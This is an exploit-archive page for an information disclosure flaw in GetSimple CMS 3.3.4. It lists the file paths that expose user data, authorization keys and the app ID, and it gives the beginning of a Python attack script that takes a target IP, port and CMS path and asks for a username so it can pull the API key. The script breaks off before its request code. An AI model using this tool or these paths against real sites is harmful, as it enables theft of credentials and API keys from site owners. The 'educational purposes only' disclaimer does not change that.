Getsimple cms 3.3.4 information disclosure Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-06-02 |
Type : webapps |
Platform : php
This exploit / vulnerability Getsimple cms 3.3.4 information disclosure is for educational purposes only and if it is used you will do on your own risk!
'''
Description:
GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to
(1) data/users/<username>.xml,
(2) backups/users/<username>.xml.bak,
(3) data/other/authorization.xml, or
(4) data/other/appid.xml.
'''
'''
User-Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]
cmspath = sys.argv[3]
print('')
username = input("Do you know the username? Y/N: ")
if username == 'Y':
print('')
username = True
username_string = input('Please enter the username: ')
else:
print('')
username = False
print('No problem, you will still get the API key')